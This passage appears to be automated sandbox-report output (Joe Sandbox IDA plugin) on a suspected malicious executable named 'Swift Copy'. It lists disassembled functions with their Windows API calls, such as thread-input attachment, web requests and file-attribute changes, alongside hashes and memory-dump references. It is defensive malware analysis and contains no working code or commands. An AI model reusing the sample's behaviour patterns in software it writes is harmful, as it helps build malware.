                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: MessageSend$LongWindow
                                              • String ID:
                                              • API String ID: 312131281-0
                                              • Opcode ID: 16bb9f1111aa98bc2d69cf430ab378720491d166ad4a950eef22b6538c9881e9
                                              • Instruction ID: 8f33d1d4d6af4549b08b9ff048e8e84723a86db268e72659030122452b3e5fc2
                                              • Opcode Fuzzy Hash: 16bb9f1111aa98bc2d69cf430ab378720491d166ad4a950eef22b6538c9881e9
                                              • Instruction Fuzzy Hash: B7614775900248AFDB10DFA8CC81EEEB7B8EB49704F104199FA15B72E1D770AE85DB60
                                              APIs
                                              • GetCurrentThreadId.KERNEL32 ref: 00DDB151
                                              • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00DDA1E1,?,00000001), ref: 00DDB165
                                              • GetWindowThreadProcessId.USER32(00000000), ref: 00DDB16C
                                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00DDA1E1,?,00000001), ref: 00DDB17B
                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 00DDB18D
                                              • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00DDA1E1,?,00000001), ref: 00DDB1A6
                                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00DDA1E1,?,00000001), ref: 00DDB1B8
                                              • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00DDA1E1,?,00000001), ref: 00DDB1FD
                                              • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00DDA1E1,?,00000001), ref: 00DDB212
                                              • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00DDA1E1,?,00000001), ref: 00DDB21D
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                              • String ID:
                                              • API String ID: 2156557900-0
                                              • Opcode ID: 46f4a954325f024540f3d7ecbcc39f7989d31ee1dc9e5263fe57e1e136e41772
                                              • Instruction ID: 9d379e88bfd384f4162ba33a38f29432ae4e04e91a09ec43c836cfccde873154
                                              • Opcode Fuzzy Hash: 46f4a954325f024540f3d7ecbcc39f7989d31ee1dc9e5263fe57e1e136e41772
                                              • Instruction Fuzzy Hash: 4131E576500204FFDB209F25EC84B6D7B7ABB11769F254207F901E6250C77199898F34
                                              APIs
                                              • _free.LIBCMT ref: 00DA2C94
                                                • Part of subcall function 00DA29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00DAD7D1,00000000,00000000,00000000,00000000,?,00DAD7F8,00000000,00000007,00000000,?,00DADBF5,00000000), ref: 00DA29DE
                                                • Part of subcall function 00DA29C8: GetLastError.KERNEL32(00000000,?,00DAD7D1,00000000,00000000,00000000,00000000,?,00DAD7F8,00000000,00000007,00000000,?,00DADBF5,00000000,00000000), ref: 00DA29F0
                                              • _free.LIBCMT ref: 00DA2CA0
                                              • _free.LIBCMT ref: 00DA2CAB
                                              • _free.LIBCMT ref: 00DA2CB6
                                              • _free.LIBCMT ref: 00DA2CC1
                                              • _free.LIBCMT ref: 00DA2CCC
                                              • _free.LIBCMT ref: 00DA2CD7
                                              • _free.LIBCMT ref: 00DA2CE2
                                              • _free.LIBCMT ref: 00DA2CED
                                              • _free.LIBCMT ref: 00DA2CFB
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: _free$ErrorFreeHeapLast
                                              • String ID:
                                              • API String ID: 776569668-0
                                              • Opcode ID: 58a1d302e7ee0bcd7dbc18fbcaa18d273defff27e43d18ebfe112fdb8d3dadab
                                              • Instruction ID: 8258b3dce0dab5e27abdbe8ebf373276700c42bf53359eedb3b2b4291545d4a0
                                              • Opcode Fuzzy Hash: 58a1d302e7ee0bcd7dbc18fbcaa18d273defff27e43d18ebfe112fdb8d3dadab
                                              • Instruction Fuzzy Hash: 45119676140108AFCB42EF5AD842CEE3BA5FF06750F4144A5FA485B222D731EA509FB1
                                              APIs
                                              • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00D71459
                                              • OleUninitialize.OLE32(?,00000000), ref: 00D714F8
                                              • UnregisterHotKey.USER32(?), ref: 00D716DD
                                              • DestroyWindow.USER32(?), ref: 00DB24B9
                                              • FreeLibrary.KERNEL32(?), ref: 00DB251E
                                              • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00DB254B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                              • String ID: close all
                                              • API String ID: 469580280-3243417748
                                              • Opcode ID: a0a32e42e94d223270ab7d4754a2988dc97c94a2b093bea74f1b623f9c1305c4
                                              • Instruction ID: 1ababd6f6609ac7d78e1f14973f60a13f2ca30d93d3697a5c6889a8dbffea67d
                                              • Opcode Fuzzy Hash: a0a32e42e94d223270ab7d4754a2988dc97c94a2b093bea74f1b623f9c1305c4
                                              • Instruction Fuzzy Hash: BCD16A35601212CFCB29EF19C895A69F7A0FF45700F24829DE54A6B251EB31ED52CF71
                                              APIs
                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00DE7FAD
                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00DE7FC1
                                              • GetFileAttributesW.KERNEL32(?), ref: 00DE7FEB
                                              • SetFileAttributesW.KERNEL32(?,00000000), ref: 00DE8005
                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00DE8017
                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00DE8060
                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00DE80B0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: CurrentDirectory$AttributesFile
                                              • String ID: *.*
                                              • API String ID: 769691225-438819550
                                              • Opcode ID: f168e02fca725ec1e58266e498d1da685778fb309d7b0123f298c67930cf0e86
                                              • Instruction ID: a157f20810f695139924fc42b96411f4bc363310f980a0ca5ac347f248c28ddc
                                              • Opcode Fuzzy Hash: f168e02fca725ec1e58266e498d1da685778fb309d7b0123f298c67930cf0e86
                                              • Instruction Fuzzy Hash: CC8191725082829BCB64FF16C4459AEB3E8FF89710F18485EF889D7250EB35DD498B72
                                              APIs
                                              • SetWindowLongW.USER32(?,000000EB), ref: 00D75C7A
                                                • Part of subcall function 00D75D0A: GetClientRect.USER32(?,?), ref: 00D75D30
                                                • Part of subcall function 00D75D0A: GetWindowRect.USER32(?,?), ref: 00D75D71
                                                • Part of subcall function 00D75D0A: ScreenToClient.USER32(?,?), ref: 00D75D99
                                              • GetDC.USER32 ref: 00DB46F5
                                              • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00DB4708
                                              • SelectObject.GDI32(00000000,00000000), ref: 00DB4716
                                              • SelectObject.GDI32(00000000,00000000), ref: 00DB472B
                                              • ReleaseDC.USER32(?,00000000), ref: 00DB4733
                                              • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00DB47C4
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                              • String ID: U
                                              • API String ID: 4009187628-3372436214
                                              • Opcode ID: be22e31693e56c404a6e7c8e8faab9fd53dab99b969674891384158816ddb678
                                              • Instruction ID: f8be2e61d033d7dd5da009bfbb23b7751934b962fe063467f3c466477efbe2f4
                                              • Opcode Fuzzy Hash: be22e31693e56c404a6e7c8e8faab9fd53dab99b969674891384158816ddb678
                                              • Instruction Fuzzy Hash: FA71D335400205DFCF21CF64C985AFA7BB5FF4A310F284269E9566A166DB31D881DFB1
                                              APIs
                                              • LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 00DE35E4
                                                • Part of subcall function 00D79CB3: _wcslen.LIBCMT ref: 00D79CBD
                                              • LoadStringW.USER32(00E42390,?,00000FFF,?), ref: 00DE360A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: LoadString$_wcslen
                                              • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                              • API String ID: 4099089115-2391861430
                                              • Opcode ID: 4573207cdf245f5ffa660a5b256e94323a388ac3714f2d1a4ff8aafbbb27a219
                                              • Instruction ID: c6d3e201933094b73c88fbe6e27abb10e64709f70a74ecc51053a33ee748a631
                                              • Opcode Fuzzy Hash: 4573207cdf245f5ffa660a5b256e94323a388ac3714f2d1a4ff8aafbbb27a219
                                              • Instruction Fuzzy Hash: 7C518C72800249BACF15FBA1CC56EEEBB78EF14300F148165F109721A1EB316A99DF71
                                              APIs
                                              • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00DEC272
                                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00DEC29A
                                              • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00DEC2CA
                                              • GetLastError.KERNEL32 ref: 00DEC322
                                              • SetEvent.KERNEL32(?), ref: 00DEC336
                                              • InternetCloseHandle.WININET(00000000), ref: 00DEC341
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                              • String ID:
                                              • API String ID: 3113390036-3916222277
                                              • Opcode ID: b1ceb47417e045f1776cd1489372c998ee21f73c361b32cc24ee6daef42dd4c8
                                              • Instruction ID: 0b066ca377c905f4cd55bdf84a3cd9eed769746c675c2dd35ebeab78bd2066a0
                                              • Opcode Fuzzy Hash: b1ceb47417e045f1776cd1489372c998ee21f73c361b32cc24ee6daef42dd4c8
                                              • Instruction Fuzzy Hash: C331C271510244AFD721AF66CC84A6B7BFCEB49744F18951EF486E3210DB31DD468B70
                                              APIs
                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00DB3AAF,?,?,Bad directive syntax error,00E0CC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 00DD98BC
                                              • LoadStringW.USER32(00000000,?,00DB3AAF,?), ref: 00DD98C3
                                                • Part of subcall function 00D79CB3: _wcslen.LIBCMT ref: 00D79CBD
                                              • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00DD9987
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: HandleLoadMessageModuleString_wcslen
                                              • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                              • API String ID: 858772685-4153970271
                                              • Opcode ID: 37fe2898e51ee5dac3eda45ac21488864805866144a128c387f86b9aa908dc34
                                              • Instruction ID: bded4a6b09d0df0d964a9237db076dd6f3206df82fad6de0464aa96deb27e6d2
                                              • Opcode Fuzzy Hash: 37fe2898e51ee5dac3eda45ac21488864805866144a128c387f86b9aa908dc34
                                              • Instruction Fuzzy Hash: 94214F32800219BBCF15AFA0CC1AEEDB779FF18700F049456F519760A1EA719658DB71
                                              APIs
                                              • GetParent.USER32 ref: 00DD20AB
                                              • GetClassNameW.USER32(00000000,?,00000100), ref: 00DD20C0
                                              • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00DD214D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: ClassMessageNameParentSend
                                              • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                              • API String ID: 1290815626-3381328864
                                              • Opcode ID: 620e13bdc041fdfdd8b2e31f290019242de65d88768b9b161a3239285854edeb
                                              • Instruction ID: f8111bb5c46f95b239b953ac0e0a7a103ae1c3eb99bf8d2330e8c81d0153629b
                                              • Opcode Fuzzy Hash: 620e13bdc041fdfdd8b2e31f290019242de65d88768b9b161a3239285854edeb
                                              • Instruction Fuzzy Hash: 751106776C8706B9FB112220EC0BDB677ACCF24724F205217FB44B52D2EE62A8469634
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                              • String ID:
                                              • API String ID: 1282221369-0
                                              • Opcode ID: 51ea79001cdb87927f5e34d9fd3b3225659016337dee275e32916cde911287cd
                                              • Instruction ID: a1fef5c4da08c0f389abbe750b30072baeb343ea18a86f1876aa5f181e9ba206
                                              • Opcode Fuzzy Hash: 51ea79001cdb87927f5e34d9fd3b3225659016337dee275e32916cde911287cd
                                              • Instruction Fuzzy Hash: 85613472D06300AFDF21AFB99881A7A7BA5EF07330F08416DFA55A7281D7319D0587B1
                                              APIs
                                              • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00E05186
                                              • ShowWindow.USER32(?,00000000), ref: 00E051C7
                                              • ShowWindow.USER32(?,00000005,?,00000000), ref: 00E051CD
                                              • SetFocus.USER32(?,?,00000005,?,00000000), ref: 00E051D1
                                                • Part of subcall function 00E06FBA: DeleteObject.GDI32(00000000), ref: 00E06FE6
                                              • GetWindowLongW.USER32(?,000000F0), ref: 00E0520D
                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00E0521A
                                              • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00E0524D
                                              • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00E05287
                                              • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00E05296
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                              • String ID:
                                              • API String ID: 3210457359-0
                                              • Opcode ID: d3a9ffed24b09ba80ab2ed402bc010125edbd4d2b5c1fddb58318a62e786454b
                                              • Instruction ID: 8bd9449151f412685cf519974db13c3c2ec7a5229799d5b07b735150bad8d542
                                              • Opcode Fuzzy Hash: d3a9ffed24b09ba80ab2ed402bc010125edbd4d2b5c1fddb58318a62e786454b
                                              • Instruction Fuzzy Hash: 3B517932A41A09FEEB209F25CC4ABDA3BA5AF05324F246112F615B62E0C771A9C0DF51
                                              APIs
                                              • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00DC6890
                                              • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 00DC68A9
                                              • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00DC68B9
                                              • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 00DC68D1
                                              • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00DC68F2
                                              • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00D88874,00000000,00000000,00000000,000000FF,00000000), ref: 00DC6901
                                              • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00DC691E
                                              • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00D88874,00000000,00000000,00000000,000000FF,00000000), ref: 00DC692D
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: Icon$DestroyExtractImageLoadMessageSend
                                              • String ID:
                                              • API String ID: 1268354404-0
                                              • Opcode ID: b3350169339a83166cb9f7001535ea52874201a2a4a87466c1865865e1cb199c
                                              • Instruction ID: 982967ce99919524a015077d988a54f993393924c7c24f41ce50251a7b4ca892
                                              • Opcode Fuzzy Hash: b3350169339a83166cb9f7001535ea52874201a2a4a87466c1865865e1cb199c
                                              • Instruction Fuzzy Hash: AD51AB70600206AFDB20DF25CC91FAA7BB5FF88750F144618F956A72E0DB71E990DB60
                                              APIs
                                              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00DEC182
                                              • GetLastError.KERNEL32 ref: 00DEC195
                                              • SetEvent.KERNEL32(?), ref: 00DEC1A9
                                                • Part of subcall function 00DEC253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00DEC272
                                                • Part of subcall function 00DEC253: GetLastError.KERNEL32 ref: 00DEC322
                                                • Part of subcall function 00DEC253: SetEvent.KERNEL32(?), ref: 00DEC336
                                                • Part of subcall function 00DEC253: InternetCloseHandle.WININET(00000000), ref: 00DEC341
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
